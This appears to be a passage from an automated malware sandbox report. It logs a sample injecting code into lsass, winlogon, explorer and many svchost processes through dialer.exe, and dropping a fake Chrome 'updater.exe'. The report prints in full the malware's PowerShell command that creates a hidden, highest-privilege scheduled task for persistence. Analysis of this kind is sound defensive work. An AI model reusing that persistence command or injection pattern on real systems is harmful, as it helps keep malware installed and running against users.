Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F4197C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 228BE340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20823A10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 144B2660000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1988E640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F724890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: 1380000 value: 4D

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Thread register set: target process: 5796	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 6252	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 6208	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 1668	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Memory written: C:\Windows\System32\dialer.exe base: 25C231F010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAE260000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3F0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: EF5FC0B010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 2549FAF010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 6F4E4CF010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A661330000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87F40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 179537D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D590000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25306E90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9ED0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD731C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E8C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870090000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184290000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 1380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F4197C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 228BE340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20823A10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 144B2660000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1988E640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F724890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }	Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: dwm.exe, 0000000A.00000000.1758015033.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000A.00000002.3032503633.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC6214A0 cpuid

7_2_00000225DC6214A0

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
